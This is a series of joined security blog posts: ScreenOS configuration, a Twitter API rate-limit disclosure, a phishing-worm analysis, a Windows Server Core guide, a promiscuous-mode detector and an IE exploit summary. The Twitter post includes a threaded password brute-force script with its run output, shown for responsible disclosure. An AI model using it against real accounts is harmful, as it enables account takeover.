screenos-1-> set interface eth0/0.4 tag 400 zone Trust

Finally, let’s setup the interface addresses.

screenos-1-> set interface eth0/0.1 ip 10.10.10.1/24
screenos-1-> set interface eth0/0.2 ip 172.16.10.1/24
screenos-1-> set interface eth0/0.3 ip 10.10.10.1/24
screenos-1-> set interface eth0/0.4 ip 192.168.10.1/24

Now we should take a look and see that everything has come out the way we expected. First, the interfaces:

screenos-1-> get interface 

A - Active, I - Inactive, U - Up, D - Down, R - Ready 

Interfaces in vsys Root: 
Name           IP Address                        Zone        MAC            VLAN State VSD      
serial0/0      0.0.0.0/0                         Null        N/A               -   D   -  
eth0/0         0.0.0.0/0                         Untrust     0017.cb80.9f40    -   U   -  
eth0/0.1       0.0.0.0/0                         Untrust     0017.cb80.9f40  100   U   -  
eth0/0.2       0.0.0.0/0                         Trust       0017.cb80.9f40  200   U   -  
eth0/0.3       0.0.0.0/0                         DMZ         0017.cb80.9f40  300   U   -  
eth0/0.4       0.0.0.0/0                         Trust       0017.cb80.9f40  400   U   -  
eth0/1         0.0.0.0/0                         DMZ         0017.cb80.9f45    -   D   -  
wireless0/0    192.168.2.1/24                    Trust       0017.cb80.9f55    -   D   -  
wireless0/1    0.0.0.0/0                         Null        0017.cb80.9f56    -   D   -  
wireless0/2    0.0.0.0/0                         Null        0017.cb80.9f57    -   D   -  
wireless0/3    0.0.0.0/0                         Null        0017.cb80.9f58    -   D   -  
bgroup0        192.168.1.1/24                    Trust       0017.cb80.9f4b    -   U   -  
  eth0/2       N/A                               N/A         N/A               -   U   -
  eth0/3       N/A                               N/A         N/A               -   D   -
  eth0/4       N/A                               N/A         N/A               -   D   -
  eth0/5       N/A                               N/A         N/A               -   D   -
  eth0/6       N/A                               N/A         N/A               -   D   -
bgroup1        0.0.0.0/0                         Null        0017.cb80.9f4c    -   D   -  
bgroup2        0.0.0.0/0                         Null        0017.cb80.9f4d    -   D   -  
bgroup3        0.0.0.0/0                         Null        0017.cb80.9f4e    -   D   -  
vlan1          0.0.0.0/0                         VLAN        0017.cb80.9f4f    1   D   -  
null           0.0.0.0/0                         Null        N/A               -   U   0  

Now the routing instances:

screenos-1-> get route
H: Host C: Connected S: Static A: Auto-Exported
I: Imported R: RIP P: Permanent D: Auto-Discovered
N: NHRP
iB: IBGP eB: EBGP O: OSPF E1: OSPF external type 1
E2: OSPF external type 2 trailing B: backup route


IPv4 Dest-Routes for <untrust-vr> (2 entries)
;--------------------------------------------------------------------------------------
         ID          IP-Prefix      Interface         Gateway   P Pref    Mtr     Vsys
;--------------------------------------------------------------------------------------
*         2      10.10.10.1/32       eth0/0.1         0.0.0.0   H    0      0     Root
*         1      10.10.10.0/24       eth0/0.1         0.0.0.0   C    0      0     Root



IPv4 Dest-Routes for <trust-vr> (8 entries)
;--------------------------------------------------------------------------------------
         ID          IP-Prefix      Interface         Gateway   P Pref    Mtr     Vsys
;--------------------------------------------------------------------------------------
*         5     172.16.10.0/24       eth0/0.2         0.0.0.0   C    0      0     Root
*         8    192.168.10.1/32       eth0/0.4         0.0.0.0   H    0      0     Root
*         4     192.168.1.1/32        bgroup0         0.0.0.0   H    0      0     Root
          2     192.168.2.1/32    wireless0/0         0.0.0.0   H    0      0     Root
          1     192.168.2.0/24    wireless0/0         0.0.0.0   C    0      0     Root
*         3     192.168.1.0/24        bgroup0         0.0.0.0   C    0      0     Root
*         7    192.168.10.0/24       eth0/0.4         0.0.0.0   C    0      0     Root
*         6     172.16.10.1/32       eth0/0.2         0.0.0.0   H    0      0     Root



IPv4 Dest-Routes for <dmz-vr> (2 entries)
;--------------------------------------------------------------------------------------
         ID          IP-Prefix      Interface         Gateway   P Pref    Mtr
;--------------------------------------------------------------------------------------
*         2      10.10.10.1/32       eth0/0.3         0.0.0.0   H    0      0         
*         1      10.10.10.0/24       eth0/0.3         0.0.0.0   C    0      0         

Based on the findings of the report, my conclusion was that this idea was not a practical deterrent for reasons which at this moment must be all too obvious.

Dr. Strangelove

Footnotes

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• The “Aurora” IE Exploit Used Against Google in Action

In our rampant speculating (guessing), we noted that we thought brute force password attacks would move away from the main Twitter login page because of their implementation of CAPTCHA (showing an image that is easy for a human to translate and type in but difficult for a computer to identify), which occurs after several failed login attempts. While some success has been reported by both researchers attempting to break CAPTCHA, as well as researchers watching others break it, the processing time of dealing with translating thousands of CAPTCHA messages becomes problematic from a password cracking standpoint (as far as we know, if you have a counter example please show us). So where does one go to perform the type of brute force password attack that a teenage hacker used in January to gain access to Crystal the Twitter admin’s account, achieve ‘Happiness’ and allow others to tweet on behalf of Barack Obama and Britney Spears?

Back in January the @BarackObama account was broken into.

We thought that the Twitter API (application program interface) is the next place to go. While moving towards OAuth authentication (a mechanism by which users can provide others access to their data without providing their authentication credentials) the old style API calls with user name and password are still available. Providing an API is one of the primary reasons for Twitter’s popularity, as many tools can provide both interfaces into the online services of Twitter, as well as act as aggregators for the data within Twitter’s data stores. In fact, for most tweeple, the actual system confines of Twitter might as well be a big database, as they are doing their tweeting through TweetDeck or Tweetie, monitoring topics at TwitterFall, looking at their favorite famous twits at Congressional140 or CelebrityTweet, mapping the world’s tweets with TwitterVision, or evaluating themselves with CurseBird.

That same API provides an alternate path for logging into Twitter, and provides all the functionality available through the web application (authentication, reading tweets, tweeting). You can read more about the overall Twitter API here: http://apiwiki.twitter.com.

But wait you say, are you trying to tell us that brute force password attacks will move to the API when I just read on the Twitter API wiki that the API severely limits the rate of calls you are allowed to make to it (200/hour/IP for authenticated requests without whitelisting)? That should be a mitigating control. Should be, but isn’t, because it is not enforced on all of the API calls.

Rate Limit? We don’t need no stinking rate limit.

From the twitter API documenation on account/verify_credentials Twitter states:

Returns an HTTP 200 OK response code and a representation of the requesting user if authentication was successful; returns a 401 status code and an error message if not. Use this method to test if supplied user credentials are valid. Because this method can be a vector for a brute force dictionary attack to determine a user’s password, it is limited to 15 requests per 60 minute period (starting from your first request).

Well, let’s see. Using a simple python program that tried known incorrect passwords as fast as the the API would respond (but well below DOS thresholds), we have this:

[~]% time python twitterauthcheck.py
Login: _eeeeeeeek Password: 0 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 1 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 2 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 3 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 4 failed: HTTP Error 401: Unauthorized

[......SNIP......]

Login: _eeeeeeeek Password: 295 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 296 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 297 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 298 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 299 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: <redacted> accepted
/opt/local/bin/python2.6 testingauth.py  2.03s user 1.47s system 1% cpu 4:25.05 total

So looking at the details we have 300 passwords attempted in 2 minutes and 3 seconds. We can also see on the 300th attempt the password was accepted (we put the correct password in at number 300) so we can conclude that the account is not getting locked out due to enforcement of rate limits. So next we ran the script six times concurrently (3,600 attempts). Still not locked out.

We are also showing that we are able to blow through the overall 150 request limit per IP per hour that Twitter reports is the rate limit. Running multiple attempts did start to hit some 503 Bad Gateway errors which we thought might be the end of the road, but no, it started responding again a second later.

Running the script is slow. Twitter’s greatest defense here against a true brute force attack using a single thread is that it takes a while for their infrastructure to respond. We can call that security through lack of capacity. Since a good password cracker takes more then a few hundred entries to work (this LOphtCrack dictionary has 235,007 entries.), we’ll go multi-threaded.

In a final controlled example, we use a known account where one person sets a dictionary word simple password and the other person runs the script without specifically knowing the password (just in case someone wants to write a Computer Fraud and Abuse Act essay in the comments, when someone logs into their own account its called authentication). Again, low request threshold, and only accessing our own account.

25,086 attempts thus far before we got bored watching it, so a little over 7 hours and the whole 200,000+ dictionary word list would be done, and likely any account using a common dictionary based password would be accessed. We tried a few subsequent runs that mixed in a correct password just to ensure everything was working, and the program notified us of the successful login.

If Twitter wants to minimize the probability of success for this vulnerability it could:

• Enforce its stated rate limits.
• Start requiring minimally complex passwords.
• Complete the migration to OAuth.

As we like Twitter as much as the next, and because we are in favor of good faith disclosure, we have notified them of our concerns. Update: A Twitter representative has responded that the information provided has been sent on to the right internal team at Twitter.

Here’s the Code: threadedtwitter.py
Dictionary: dic.txt

Please note, the code is provided for demonstration purposes only, should not be run ever, and contains intentional errors so that attempts to run it will not work.

The command is as follows: twitterauthcheck.py username passwordlist.txt

import threading,Queue
import socket
import tweethon
import urllib2
import socket
import sys

class Threader:
    # Class taken from: Sept 3 2004, Justin A: http://code.activestate.com/recipes/302746/
    def __init__(self, numthreads):
        self._numthreads=numthreads

    def get_data(self,):
        raise NotImplementedError, "You must implement get_data as a function that returns an iterable"
        return range(10000)
    def handle_data(self,data):
        raise NotImplementedError, "You must implement handle_data as a function that returns anything"
        time.sleep(random.randrange(1,5))
        return data*data
    def handle_result(self, data, result):
        raise NotImplementedError, "You must implement handle_result as a function that does anything"
        print data, result

    def _handle_data(self):
        while 1:
            x=self.Q.get()
            if x is None:
                break
            self.DQ.put((x,self.handle_data(x)))

    def _handle_result(self):
        while 1:
            x,xa=self.DQ.get()
            if x is None:
                break
            self.handle_result(x, xa)

    def run(self):
        if hasattr(self, "prerun"):
            self.prerun()
        self.Q=Queue.Queue()
        self.DQ=Queue.Queue()
        ts=[]
        for x in range(self._numthreads):
            t=threading.Thread(target=self._handle_data)
            t.start()
            ts.append(t)

        at=threading.Thread(target=self._handle_result)
        at.start()

        try :
            for x in self.get_data():
                self.Q.put(x)
        except NotImplementedError, e:
            print e
        for x in range(self._numthreads):
            self.Q.put(None)
        for t in ts:
            t.join()
        self.DQ.put((None,None))
        at.join()
        if hasattr(self, "postrun"):
            return self.postrun()
        return None


class twitterpasswordtester(Threader):

    def get_data(self):
        data = open(sys.argv[2]).read()
        data = data.split('\n')
        self._usename = sys.argv[1]
        self.counter = 0
        return data

    def handle_data(self,p):
        print "in testAuth"
        u = self._usename
        x = tweethon.Api(username=u, password=p)
        x.SetCache(None)
        try:
            x.VerifyCredentials()
            results = "login: {0} Password: {1} accepted\n".format(u, p)
        except urllib2.HTTPError, e:
            results = "login: {0} Password: {1} failed: {2}\n".format(u, p, e)
        finally:
            del x
            return results

    def handle_result(self, data, result):
        print result
        print self.counter 
        self.counter += 1
        self.res.append((data,result))
    def prerun(self):
        self.res=[]
    def postrun(self):
        return self.res


z = twitterpasswordtester(10)
for n,ns in  a.run():
    print n,ns

Tweethon Source: http://bitbucket.org/jrossi/tweethon/src/tip/README

The Tweethon library, the only custom or uncommon library above, is intended to make the Twitter web services API easier for python programmers to use.

Related Posts:

• Persistent XSS on Twitter.com
• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.

The phishing site's Twitter login page.

The real Twitter homepage

Because direct messages are private it is not possible for anyone but Twitter itself to pinpoint both when the attack began and the original seeding of the attack (whether compromised user accounts, previously set up Spam/bot accounts, or another method. A number of accounts appear to have been affected; by 5pm TwitScoop (a service that monitors popular Twitter trends) started reporting trending words including “hacked”, “worm”, and “spreading”. The attack is effective based on two classic principles of social engineering: the message comes from someone you have previously followed (and implicitly trust on some level) and the message appeals to a combination of curiosity and vanity.

On Twitter you can only send a direct message to someone who is following you. Or put another way, only someone whose updates you have previously expressed an interest in and signed up for (followed) can send you one of these messages. This attack is the Twitter equivalent of e-mail phishing schemes that use an e-mail sent from someone else’s address book, essentially you theoretically know the person already and are more likely to open an e-mail received from them. Combine the suggestion that this person you know or know of has found a video of you online, a login screen that is familiar, and you end up with a number of compromised Twitter accounts.

The direct message containing the link to the spoofed Twitter login.

This is far from the first worm Twitter has faced (Koobface, StalkDaily, mikeyy), and is not even the first direct message phishing style attack in this style. While labeled a worm on Twitter, it is not confirmed thus far that this is a self-replicating program, an important part of the definition of a computer worm, it just appears that way. In order to get some understanding of this, Twitter would have to release some analysis of their logging, showing some correlation between a compromised Twitter account, a direct message to a group of parties, and then a subsequent compromise and direct message from within that second group, and so on in the chain. For now we’ll assume this is the path this attack is taking with the evidence we have noticed thus far. Regardless since everyone is referring to this as a Twitter worm, for the sake of clarity, we’ll continue to call it a worm here and update if proven otherwise.

What happened if you did go ahead and put credentials in the login screen: Fail Whale.

If you put some string in for the login or password, this is the response.

No Newcomer

The URL in question is hosted in Beijing, China according to GeoIP, the host is listed as Chinanet Yunnan Province Network which is China Telecom’s (3rd biggest mobile telecom provider in China) internet service. The e-mail address used in the registration, lixing688@gmail.com, links this up to similar phishing sites for Twitter and MySpace identified in the malwaredomainlist forums back in July. That time around the site url was: secure-login.twitter.verifiylogin.com/twitter/. MySpace was cloned at rnyspece.com.

Another URL, Faecibook.com, with the same e-mail address for registrar is a phishing site that appears to prey on users in a way very similar to the Twitter attack, posting comments on Facebook such as this: “seen this really bad blog about you? http://www.jdsense.com/search/redirect.php?f=http://blogs.faecibook.com/sessionid?nglnbskuf”.

That e-mail was also used in a series of money transfer agent scams (money mules) with bogus charity phishing web sites (KPEREZHOME, Rodney Lawrence International, Edward White, et. al) all hosted on a problematic registrar, the Xin Net Technology Corporation.

A photographer, Warren Henke, wrote a blog post describing receipt of a phishing e-mail associated with this scam from the Glen Hamilton International Organization.

The Rodney Lawrence International phishing site.

Something New

One of the differences with this attack that separates it from previous ones is that in the time since the more famous compromises of January of this year (Barack Obama, Britney Spears, CBS News, Kevin Rose) Twitter has implemented some controls around the login screen, including a CAPTCHA element that shows up after several bad password entries.

CAPTCHA is a program designed to differentiate humans from computers and prevent abuse by bots, automated programs used to generate spam among other things. It is a contrived acronym standing for Completely Automated Public Turing test to tell Computers and Humans Apart. CAPTCHA has three primary principles: the computer can’t solve it, most humans can, and the tool does not rely on some form of obscurity such as being a new implementation.

reCAPTCHA, a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows.

Actually reCAPTCHA is used, a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows. When you are translating the image to text, you are acting as a human optical character recognition (OCR) translator. The service was acquired by Google this month. Circumventions of CAPTCHA have occurred with each step in the method’s evolution, starting in wide use from Yahoo’s EZ-Gimpy program, using roughly the same three step process: pre-processing or removing the background obscurities, segmentation or separating the letters, and classification or identification of each letter. Segmentation remains the one area where humans outperform computers; however, spammers are achieving some level of success in this area. Here is a good analysis from WebSense detailing how a service in Russia is achieving a 20% rate in automated breaks of CAPTCHA images.

So CAPTCHA, while not perfect, does help mitigate dictionary brute force password attacks in that it adds another layer of complexity to the authentication process. Some of the reasons for beating CAPTCHA are to be able to post blog comment spam, create fraudulent accounts such as the e-mail example above, and similar automated completion of web forms designed for human interaction. In these applications it makes sense: a download of the image, a translation to text, and the comment spam is posted, the e-mail account created, and so forth. If two or three out of every ten requests is successful, the comment will be posted or new account opened at an acceptable rate.

In a password cracking application, which moves through a number of password possibilities for each id quickly the additional processing combined with a less than perfect translation rate adds a level of complexity likely not used. With that in mind, how does the bad actor break into Twitter accounts easily? The answer may lie in the Twitter API, which while limiting the rate of requests still allows for a large request rate upon request. That is not to suggest that this is definitely what this attacker did, in fact the bad actor in this case may have previously had compromised ids, may have used more conventional spam tactics to get an original seeding of ids, or may have broken into a few early accounts as discussed here. Only Twitter could potentially have the log access to figure this out.

Related Posts:

• Persistent XSS on Twitter.com
• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.

This article is not just for the CLI fans like me, who snicker when forced to grab at the mouse for tasks they much prefer taking on in that wonderful black box with the blinking cursor; but for anyone who will deploy a core installation of Windows. This is not an anti-GUI rant, but a look into the CLI, and one that is much needed after Microsoft released Windows 2008 Server Core Edition.

Microsoft started to return CLI tools back to administrators in Windows 2000 when they released netsh.exe. More and more CLI options surfaced with releases of Support Tools, Resource Kits, and the popular PS suite from SysInternals (now Microsoft). The most recent evidence of the resurgence of the CLI is Windows 2008 Server Core Edition. This version is entirely driven with the command line interface.

The following roles are supported in a core installation:

• Active Directory Certificate Services
• Active Directory Domain Services
• Active Directory Lightweight Directory Services (AD LDS)
• DHCP Server
• DNS Server
• File Services (including File Server Resource Manager)
• Hyper-V
• Print and Document Services
• Web Server (including a subset of ASP.NET)

Why choose core over a standard installation? A core setup will only install the binaries needed by the server roles. Microsoft claims that if Windows 2000 Server had a core edition, it would have had a 60% reduction in patches (40% in Windows 2003). This is a considerable amount of patches for critical servers such as domain controllers.

So let’s get started with some administration tasks in Windows 2008 Server Core Edition: getting things up and running, configuring roles, promoting to a domain controller, and essentially running a version of Microsoft’s OS that does not include explorer.exe. (What? No Desktop?)

The following commands were executed on an installation of Microsoft Windows 2008 Server Core Standard R2. For those who don’t have the time to muck with the CLI, R2 has included a new VBScript (sconfig.vbs) which provides a menu driven server configuration tool to quickly get through these steps. However, I recommend doing it the long way at least once to understand what’s happening in case you run into issues in the future. The install is straightforward, so details not needed. Most important is the option of which version of the OS to install, which I selected Windows 2008 R2 Standard (Server Core Installation). After a dialog to set the administrator password, I’m left with a DOS prompt.

GETTING STARTED

First things first, IP connectivity. I’ll be using 192.168.1.0/24 for the network:

Note: netsh.exe allows you to add all the options/parameters in one line, or you can run netsh.exe and go into each configuration category, (ie. interface), then eventually when deep enough into the options, execute the command, (ie. set). To keep it simple, I’ll write out the commands in single lines, but definitely run netsh.exe with no options and look into the many configuration areas available.

Let’s list available network interfaces to see which one we need to configure:

netsh interface ipv4 show interfaces

Result:

  Idx     Met        MTU           State                Name
  –--  ----------  ----------  ------------  ---------------------------
    3           5        1500  connected     Local Area Connection
    1          50  4294967295  connected     Loopback Pseudo-Interface 1

netsh int ipv4 set address name=3 source=static address=192.168.1.25 mask=255.255.255.0 gateway=192.168.1.1

Note the name=3 parameter; 3 was the IDX number retrieved in the previous step. You will not get a resulting output, but you can double check your settings by running ipconfig /all.

Next step is to add DNS servers for name resolution. If this will be the first Domain Controller in the Forest and will run DNS, you can skip this, otherwise, add your DNS servers now (the example assumes DNS servers 192.168.1.20 and 192.168.1.21):

netsh interface ipv4 add dnsserver name=3 address=192.168.1.20 index=1

add a secondary dns server:

netsh interface ipv4 add dnsserver name=3 address=192.168.1.21 index=2

Note that we used the name=3 parameter again to add these DNS entries to the network interface we are interested in. Once again, you can double check your settings with ipconfig /all.

Now we have connectivity. Let’s rename the computer and join a domain. Windows had assigned a random computer name, you can see what it is by typing hostname. Mine happened to be WIN-EPNB8G5FAUI. Let’s rename this to CORE-DEV:

netdom renamecomputer %COMPUTERNAME% /NewName:CORE:DEV

You will be warned about the potential hazards of renaming the computer, not our concern since this is a brand new installation. Proceed, and you will have the following results:

The computer needs to be restarted in order to complete the operation.

The command completed successfully.

Restart the computer by typing: shutdown /r /t 001

After restarting, log back in, and let’s join a domain. Our test domain is called testdom.local. We will use an account called admin to join the domain:

netdom join CORE-DEV /domain:testdom.local /userd:testdom\admin /passwordd:*

The * for the password option will prompt you for the password. A reboot is again required.

Now you can log in with a domain account by choosing other user, then typing domain\user for the user.

ACTIVATION

Now, let’s activate Windows. In R2, you enter the license key with slmgr.vbs (prior to R2, the installation setup prompted for the license key).

slmgr.vbs –ipk ABCDE-FGHIJ-KLMNO-PQRST-UVWXY

Next, activate:

slmgr.vbs -ato

If successful, you will not receive any messages back.

CONFIGURING AUTOMATIC UPDATES

I recommend controlling the behavior of automatic updates with Group Policy, but if you need to toggle the settings, here are the commands:

To verify the current setting:

cscript scregedit.wsf /AU /v

To enable automatic updates:

cscript scregedit.wsf /AU 4

To disable automatic updates:

cscript scregedit.wsf /AU 1

To check for updates:

wuauclt /detectnow

FIREWALL

Let’s take a look at the firewall now, since we will want to open up some rules to perform remote administrations tasks, such as using Remote Desktop or MMC tools to manage the server.

We can take a look at the firewall profiles by typing:

netsh advfirewall show allprofiles

If you have a domain profile applied via GPO, then those will apply. You can also look at all the rules by typing:

netsh advfirewall firewall show rule name=all

That command will display quite a bit of information. I like to output it to a text file and view it with notepad.

Now, let’s make some changes to allow remote connections to the server. Here, I don’t exactly follow the steps documented in Technet or most web sources since the commands documented will open up the ports and allow any source address. Here, we open Remote Desktop (TCP-3389) only to our subnet.

netsh advfirewall firewall set rule name="Remote Desktop (TCP-In)" new remoteip=192.168.1.0/24

This changes the firewall RDP rule to allow our subnet only. The default rule is Any. Now, let’s go ahead and enable this rule:

netsh advfirewall firewall set rule name="Remote Desktop (TCP-In)" new enable=yes

The firewall is now open for RDP connections from our internal subnet, but we still have to enable Remote Desktop:

cscript %windir%\system32\SCRegEdit.wsf /ar 0

Now you could Remote Desktop to the server. Of course you will only get a command prompt when you do.

Next, we’ll open up some rules to allow remote management using the MMC. This will allow using Computer Management, Shared Folders, Event Viewer, and other important snap-ins to manage your server. The process is the same as it was opening the Remote Desktop rule, but the rule names are different:

netsh advfirewall firewall set rule name="Remote Administration (NP-In)" new remoteip=192.168.1.0/24
netsh advfirewall firewall set rule name="Remote Administration (NP-In)" new enable=yes
netsh advfirewall firewall set rule name="Remote Administration (RPC)" new remoteip=192.168.1.0/24
netsh advfirewall firewall set rule name="Remote Administration (RPC)" new enable=yes
netsh advfirewall firewall set rule name="Remote Administration (RPC-EPMAP)" new remoteip=192.168.1.0/24
netsh advfirewall firewall set rule name="Remote Administration (RPC-EPMAP)" new enable=yes

These three rules are in a group called “Remote Administration” and if you are not concerned about modifying the rules so that only the specific subnet is allowed, you can modify enable the group as-is which will allow connections from any IP:

netsh advfirewall firewall set rule group="Remote Administration" new enable=yes

CONFIGURING ROLES

There are two commands to use when dealing with server roles: oclist and ocsetup. Later, we will look at the new dism.exe If you type oclist, you will get a list of all the roles and their optional components. The list is pretty lengthy, so I like to use the find command to narrow my results. For example, if we wanted to add the DHCP server role, I would check for the precise name of the role by typing:

oclist | find /i "dhcp"

Results:

Not Installed: DHCPServerCore

Now I know the role name is specifically DHCPServerCore and that it is in fact not installed. So, we install the role by typing:

ocsetup DHCPServerCore

Note that the above server role IS case sensitive. If I use oclist again to check for DHCP, I now see the following:

oclist | find /i "dhcp"

Results:

Installed: DHCPServerCore

If I wanted to remove the role, I’d use the uninstall switch with ocsetup:

ocsetup DHCPServerCore /uninstall

Pretty straight forward. Now, with R2, there is a new CLI tool called dism.exe. This tool can also configure server roles, but it does much more. For now, we will use it to configure roles like we did with ocsetup/oclist.

To get a list of roles (called features in dism):

dism /online /get-features

Let’s add that DHCPServerCore feature using dism:

dism /online /enable-feature /featurename:DHCPServerCore

And then to remove it:

dism /online /disable-feature /featurename:DHCPServerCore

So, what is the big deal? Same results as ocsetup, but, dism will replace it because it goes further than just toggling features. It will service WIM and VHD image files, allowing add/remove of drivers and features, especially useful if your server has the role of deploying images or runs Hyper-V.

PROMOTING TO A DC

dcpromo is still the way to handle promoting and demoting domain controllers, but in a Server Core installation, there is no GUI wizard that comes along with it. Instead, you use an answer file with the command to instruct how to promote your DC. The syntax to this is:

dcpromo /unattend:c:\temp\answerfile.ini

I like to use ini for my answer file extension, but that’s a personal preference. Here are two examples of answer files to us with dcpromo:

To create the very first DC in a Forest:

[DCInstall]
ReplicaOrNewDomain=Domain
Installdns=Yes
confirmgc=yes
domainlevel=4
domainnetbiosname=TESTDOM
forestlevel=4
newdomain=forest
newdomaindnsname=testdom.local
safemodeadminpassword=password123

To add a replica domain controller in an existing domain:

[DCInstall]
ReplicaOrNewDomain=Replica
ReplicaDomainDNSName=testdom.int
Installdns=Yes
confirmgc=yes
safemodeadminpassword=password123

MORE IN THE CLI

Now you have a fully functioning server, are able to manage it with your MMC, and can connect via Remote Desktop. Although there are hundreds of commands you can use in the CLI, one that can do an enormous amount of tasks is wmic.exe. WMIC is a tool with hundreds of options for WMI. You can do just about anything here. A few examples:

wmic useraccount list
wmic process list
wmic share list

The above examples are all very simple queries for information. You can also use wmic to add and modify (ie. not just list shares, but create or change them). To see a full list of options: wmic /?

POWERSHELL

Powershell is now included with R2 and you can enable it just like any other feature. Powershell provides a shell and scripting language which will open up a world of options for administrating your Windows environment. What gives this shell its power is that it accepts and returns .NET objects. Instead of getting stdout, you can get an object and then perform actions with that object or get its properties. With a couple of lines of script code, you can pull all users from an OU and set their description field, or check when the passwords were last set. That is just one simple example working with objects using the DirectoryServices interface, and there are many others.

CONCLUSION

It is nice to see that the command line has made a return in the Windows world. If you’re unlike me, who typically has five or six command prompts open during a regular day, don’t be intimidated by it. Server Core can be a lean, secure, and well-managed option in your environment. It may take a little time getting used to not reaching for the mouse and clicking on the start button, but at the end of the day you will have that extra bit of satisfaction knowing exactly what occurred without a GUI keeping the details behind the scenes.

References:

• Real Men Don’t Click–The Project: http://isg.ee.ethz.ch/tools/realmen/
• Server Core Installation: http://technet.microsoft.com/en-us/library/cc753802(WS.10).aspx
• Using DISM: http://www.windowsnetworking.com/articles_tutorials/Deploying-Windows-7-Part2.html
• DISM Command Line Options: http://technet.microsoft.com/en-us/library/dd772580(WS.10).aspx
• WMIC: http://technet.microsoft.com/en-us/library/bb742610.aspx
• Powershell: http://www.microsoft.com/windowsserver2003/technologies/management/powershell/default.mspx
• Windows 2008 Command Line List (A-Z): http://technet.microsoft.com/en-us/library/cc772390(WS.10).aspx

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• The “Aurora” IE Exploit Used Against Google in Action

This information can be handy for several reasons:

• An interface running in promiscuous mode may be due to the user running network sniffer such as Wireshark.
• An interface running in promiscuous mode may be due to the user running virtualization software, such as Virtual PC.
• An interface running in promiscuous mode may be due to malicious code.

I definitely want to know if users are running network sniffers, or virtualization software (likely the guests are not licensed or managed causing rogue workstations in the environment). Of course any potential activity that may be caused by malware or malicious code is a concern as well.

You could very easily download promqry and run a for loop against your machines. I wanted to use WMI for this task instead and rather than a text file, use the directoryservices object to query my AD for computers.

I couldn’t find any property in Win32_NetworkAdapterConfiguration to check for this, but I found this post on promqry which tracked down the WMI classes it uses. That led me in the right direction. The other key to this is what MSNdis_CurrentPacketFilter returns. Microsoft documents this here and we are checking if the NDIS_PACKET_TYPE_PROMISCUOUS bit is enabled.

Below is a quick Powershell script which will grab computer objects from AD, then use WMI and the MSNdis_CurrentPacketFilter class to check for promiscuous mode. You can incorporate this WMI query with Win32_NetworkAdapterConfiguration and get a better picture of the interface network settings:

$ErrorActionPreference = "SilentlyContinue"


$PingTest = New-Object System.Net.NetworkInformation.Ping
$Filter = "(&(ObjectCategory=computer))"
$Searcher = New-Object System.DirectoryServices.DirectorySearcher($Filter)
ForEach ($comp in $Searcher.Findall()) {
    $strComputer = $comp.properties.item("Name")
    write-host "Checking: $strComputer"
    if ($PingTest.Send($strComputer).Status -eq "Success") {
        $colComputer = get-wmiObject -class "MSNdis_CurrentPacketFilter" -namespace "root\WMI" -comp $strComputer
        if ($colComputer -eq $null) {
            write-host "Couldn't connect to WMI" }
        else {
            foreach ($comp in $colcomputer) {
                $val = $comp.NdisCurrentPacketFilter
                if ($val -band 0x00000020) {
                    $inst = $comp.InstanceName
                    write-host "Interface: $inst"
                    write-host "The NDIS_PACKET_TYPE_PROMISCUOUS value is set" -foregroundcolor red -backgroundcolor yellow
                }
            }
        }
    }
    else { write-host "Could not ping, machine not queried." }
}

The following screenshot shows the results. I don’t like waiting for RPC to time out when the machine is off or not reachable, so a quick ping check before querying WMI speeds things up. Also, when an interface has the bit set, the output is highlighted with red text and a yellow foreground. You could wrap an email function and schedule this so that you are alerted when it comes up.

You will need proper access to the workstations to query root\WMI so when you run this in a domain, your account should have local administrator privileges to the computers it will query. If it doesn’t, the command will return “Couldn’t connect to WMI”.

Finally, if you haven’t looked at the MSNdis class yet, I suggest taking a look, especially at MSNdis_80211 which will query various wireless information that may be of interest. There isn’t a whole lot of documentation on it, so I’ll work on getting some details together and maybe draft a Powershell script to find wireless adapters and networks they are connected to or available networks close enough to connect to. Until then, enjoy finding those promiscuous mode adapters in your domain.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010

Bear with the Onion’s silly advertising in the beginning.

Ex-Pedophile Shares Tips On How To Make Your Kids Less Attractive

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010

Background

The news hit the web at large on July 6th when Microsoft released advisory 972890. IBM ISS is reporting a first known exploit however on June 11th. The vulnerability, first reported by researchers Alex Wheeler and Ryan Smith (ISS employees at the time) was first reported to Microsoft in 2008, which has sparked criticism from at least one reporter covering the IT marketplace: eWeek’s Brian Prince. The problem would have been available since IE version 6, SP1.

Exploit Details

The exploit is described by MSRC Engineer Chengyun Chu as a “browse and get owned attack vector”. Once the user navigates to a web site purposely hosting the exploit, or a web site that has been compromised to host the exploit, no further user interaction is required. Examples in the wild (approximately 967 Chinese web sites according to Trend Micro) are reporting having used both .gif and .jpg files containing the exploit. The Trend Micro found web sites that redirect the users multiple times, eventually loading a .jpg file with the exploit, which upon being successful loads malware called WORM_KILLAV.AI. This malware, as it is named, terminates antivirus software processes and loads additional malicious code.

The exploit is based on an overflow condition that is created in the msvidctl.dll library when a crafted file is provided as input, causing a handler to be overwritten which then points to the exploit’s shell code, already loaded in the memory heap via heap spraying. The object that accepts the crafted input, BDATuner.MPEG2TuneRequest.1, is associated with CLSID 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF, and thus this is the primary CLSID for which a kill bit needs to be set. Microsoft however recommends setting the kill bit for all of the ActiveX Control Objects hosted by msvidctl.dll.

